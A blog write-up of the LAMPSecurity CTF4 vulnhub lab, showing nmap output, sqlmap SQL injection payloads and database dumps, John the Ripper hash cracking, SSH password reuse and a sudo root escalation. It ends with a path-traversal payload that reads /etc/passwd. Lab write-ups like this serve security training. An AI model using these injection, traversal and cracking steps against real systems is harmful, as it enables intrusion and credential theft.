LAMPSecurity: CTF4
Posted on 29 Aug 2014 in security • 4 min read
I start the LAMPSecurity CTF4 challenge of vulnhub available here. The goal is to get a root shell on the server.
Discovery
First of all we need to determine the IP address of the server.
Since we launch it in a bridged virtual machine the local router got the IP
address in the DHCP logs. We simply found the most recent one. For me it is
192.168.1.56.
Nmap
Let start with a simple nmap
#nmap -A -oA ctf4 192.168.1.56
Nmap 6.47 scan initiated Thu Aug 28 18:49:49 2014 as: nmap -A -oA ctf4 192.168.1.56
Nmap scan report for 192.168.1.56
Host is up (0.00058s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
| 1024 10:4a:18:f8:97:e0:72:27:b5:a4:33:93:3d:aa:9d:ef (DSA)
|_ 2048 e7:70:d3:81:00:41:b8:6e:fd:31:ae:0e:00:ea:5c:b4 (RSA)
25/tcp open smtp Sendmail 8.13.5/8.13.5
| smtp-commands: ctf4.sas.upenn.edu Hello [192.168.1.97], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, EXPN, VERB, 8BITMIME, SIZE, DSN, ETRN, DELIVERBY, HELP,
|_ 2.0.0 This is sendmail version 8.13.5 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP <topic>". 2.0.0 To report bugs in the implementation send email to 2.0.0 sendmail-bugs@sendmail.org. 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info
80/tcp open http Apache httpd 2.2.0 ((Fedora))
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
| http-robots.txt: 5 disallowed entries
|_/mail/ /restricted/ /conf/ /sql/ /admin/
|_http-title: Prof. Ehks
631/tcp closed ipp
Aggressive OS guesses: Linux 2.6.16 - 2.6.21 (98%), Linux 2.6.13 - 2.6.32 (96%), Control4 HC-300 home controller (96%), Lantronix SLC 8 terminal server (Linux 2.6) (96%), SNR SNR-S2960 switch (95%), SonicWALL Aventail EX-6000 VPN appliance (94%), Linux 2.6.8 - 2.6.30 (94%), Dell iDRAC 6 remote access controller (Linux 2.6) (94%), Linux 2.6.9 - 2.6.18 (94%), Linux 2.6.18 - 2.6.32 (94%)
No exact OS matches for host (test conditions non-ideal)
Service Info: Host: ctf4.sas.upenn.edu; OS: Unix
We found a list of available services:
- a SSH service on port 22
- a mail service on port 25
- a web service on port 80, note that there is five disallowed entries in robots.txt
- and a close CUPS service on port 631.
The website
Let's take a look at the web site. It is a simple blog site with a XSS flaw on the search engine.
The article are indexed with a GET parameter id. This parameter is vulnerable to an SQL injection.
Exploitation
Sqlmap
We launch sqlmap:
#sqlmap -u 'http://192.168.1.56/index.html?page=blog&title=Blog&id=6' -p id --tables
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: page=blog&title=Blog&id=6 AND 2396=2396
Type: UNION query
Title: MySQL UNION query (NULL) - 5 columns
Payload: page=blog&title=Blog&id=6 UNION ALL SELECT NULL,CONCAT(0x7172756f71,0x494c647a675a47595a55,0x7178657471),NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: page=blog&title=Blog&id=6 AND SLEEP(5)
---
[19:44:24] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Fedora 5 (Bordeaux)
web application technology: Apache 2.2.0, PHP 5.1.2
back-end DBMS: MySQL 5.0.11
[19:44:24] [INFO] fetching database names
[19:44:24] [INFO] fetching tables for databases: 'calendar, ehks, information_schema, mysql, roundcubemail, test'
Database: calendar
[5 tables]
+---------------------------------------+
| phpc_calendars |
| phpc_events |
| phpc_sequence |
| phpc_users |
| uid |
+---------------------------------------+
Database: roundcubemail
[6 tables]
+---------------------------------------+
| session |
| cache |
| contacts |
| identities |
| messages |
| users |
+---------------------------------------+
Database: ehks
[3 tables]
+---------------------------------------+
| user |
| blog |
| comment |
+---------------------------------------+
Database: information_schema
[16 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| KEY_COLUMN_USAGE |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+
Database: mysql
[17 tables]
+---------------------------------------+
| user |
| columns_priv |
| db |
| func |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| proc |
| procs_priv |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
+---------------------------------------+
Okay so there is a lot of database let's dump the ehks users table:
# sqlmap -u 'http://192.168.1.56/index.html?page=blog&title=Blog&id=6' -p id -D ehks -T user --dump
+---------+-----------+----------------------------------+
| user_id | user_name | user_pass |
+---------+-----------+----------------------------------+
| 1 | dstevens | 02e823a15a392b5aa4ff4ccb9060fa68 |
| 2 | achen | b46265f1e7faa3beab09db5c28739380 |
| 3 | pmoore | 8f4743c04ed8e5f39166a81f26319bb5 |
| 4 | jdurbin | 7c7bc9f465d86b8164686ebb5151a717 |
| 5 | sorzek | 64d1f88b9b276aece4b0edcc25b7a434 |
| 6 | ghighland | 9f3eb3087298ff21843cc4e013cf355f |
+---------+-----------+----------------------------------+
Cracking the hashes
We save the hahses in a file (option proposed by sqlmap) and we launch john the ripper on it:
#john hashes --format=raw-md5
sorzek:pacman
jdurbin:Sue1978
2 password hashes cracked, 4 left
We test the cracked password on:
- the restricted part: there is two text files about how to blog and how to use the web mail
- the admin part: with the two cracked accounts we can only write new article, that is not really useful for our CTF
- the mail part: according to the instruction on the restricted part we can access the user's emails from here.
We found in an email from sorzek to ghighland that he just add a number to is useual password "undone" so we just tell john to try password from undone0 to undone9999. We cracked an other password:
ghighland:undone1
SSH connexions
Okay the same password seems to be used everywhere and I was a bit lost to how to continue so I try the credentials on the ssh service: it works!
First of all I logged with the jdurbin account. There seems to be anything useful but in my search I saw that achen had an ssh private key readable by everyone (a ppk one for PuTTY). Okay lets use it to connect on the machine. It ask no password and we got a shell, what now?
Privileges escalation
I try to see what was the differences with this account and I saw a pdf file
"linux_administration.pdf" so I tried to use the sudo command with sudo -v and
once again: it works!
So a simple sudo su give us the root rights.
DONE!
Summary
Lets resume :
- exploitation of the SQL injection
- cracked the hashes
- use the credentials on the SSH service
- find the ppk SSH key
- use it to connect on the achen account
- sudo su
That was a easy one !
Nota bene
Oh yeah we do not explore the lead of the file injection in the page GET parameter:
http://192.168.1.56/index.html?page=../../../../../../etc/passwd%00&title=Blog&id=5
Moreover the root password "root1234" where is the bash_history of achen.